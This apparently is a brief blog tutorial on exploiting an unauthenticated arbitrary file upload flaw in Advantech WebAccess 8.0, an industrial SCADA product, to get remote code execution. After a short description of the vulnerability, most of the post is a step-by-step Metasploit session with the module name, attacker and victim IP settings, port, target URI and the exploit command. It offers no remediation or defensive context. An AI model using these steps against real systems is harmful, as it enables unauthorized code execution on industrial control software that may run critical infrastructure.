Exploit Remote PC using Advantech WebAccess Dashboard Viewer upload Image Common Arbitrary File Upload

This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to upload arbitrary code (instead of an image) to the server, which will then be executed under the high-privilege context of the IIS AppPool.

Exploit Targets
Advantech WebAccess 8.0

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
msf exploit (advantech_webaccess_dashboard_file_upload)>set lhost 192.168.0.108 (IP of Local Host)
msf exploit (advantech_webaccess_dashboard_file_upload)>set rhost 192.168.0.102
msf exploit (advantech_webaccess_dashboard_file_upload)>set rport 80
msf exploit (advantech_webaccess_dashboard_file_upload)>set targeturi /
 msf exploit (advantech_webaccess_dashboard_file_upload)>exploit

0 comments:

Post a Comment